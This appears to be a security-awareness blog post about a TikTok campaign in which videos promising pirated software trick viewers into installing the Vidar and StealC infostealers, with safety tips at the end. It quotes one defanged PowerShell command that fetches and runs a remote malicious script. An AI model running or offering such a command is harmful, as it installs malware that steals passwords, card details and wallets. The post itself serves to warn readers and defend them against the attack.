A new malicious campaign, uncovered by reasearchers at Trend Micro, is spreaking through TikTok, featuring videos that promise free software but actually lead users to download dangerous malware. This tactic shows how attackers are exploiting popular social media platforms like TikTok to deceive users.
Hackers are posting TikTok videos that claim to show viewers how to get pirated versions of popular software applications But instead of offering legitimate downloads, they guide users to run hidden commands on their computers that install harmful programs—Vidar and StealC.
The danger here is that the attack happens outside of TikTok, where there’s no malicious code to be detected by typical app or device or security control tools. The scam relies on viewers following instructions they believe are legitimate.
TikTok is a massive platform with millions of active users, many of whom may trust what they see in videos. The platform’s algorithm helps content go viral, making it an ideal place for cybercriminals to reach a large audience quickly. And with realistic AI-generated voices and automated video production, these scams can be easily scaled and tailored to different audiences.
How Does It Work
These programs are designed to steal personal information, like passwords, credit card numbers, and even cryptocurrency wallet details. And the attack doesn’t involve malicious code inside the TikTok videos themselves, but rather rely on social engineering—tricking users into running the harmful commands themselves. The chain usually goes like this:
- Watch the Video/Content – The video promises free software and tells viewers to open the Windows PowerShell tool.
- Run Command & Install – The video gives a PowerShell or terminal command that seems harmless but secretly downloads malware. Once the command is run, the malware (Vidar or StealC) is downloaded and starts stealing personal information.
In one example, a video instructed viewers to run this PowerShell command:
iex (irm hxxps://allaivo[.]me/spotify)This command, when executed, secretly downloaded a malicious script from an external server, which then installs the Vidar or StealC malware on the unsuspecting victim’s computer. Once installed, these programs start stealing sensitive information like passwords, credit card details, and even cryptocurrency wallet data.
TikTok may be a fun platform, but just like with any social media, it’s important to stay aware of the risks. Whether on TikTok for fun, work, or anything in between, here’s some good habits to practice for staying safe:
Be Skeptical of Free Software Offers: If a video promises free or pirated software, it is probably a scam.
Use Trusted Security Tools: Utilize antivirus software on your devices for real-time protection that helps detect and block threats.
Avoid Running Commands/Actions: Don’t run PowerShell or terminal commands, or other random actions on your system from random videos or websites, especially if you’re unsure of the source.
Think Before Clicking: If something seems too good to be true, it likely is. Always double-check the legitimacy of offers and instructions you see online
This new malware campaign shows how hackers are using different platforms to manipulate users into infecting their own devices.
Stay vigilant, protect your personal information, and be cautious when following offers, deals, or online tutorials, especially if they seem too good to be true.
Leave a Reply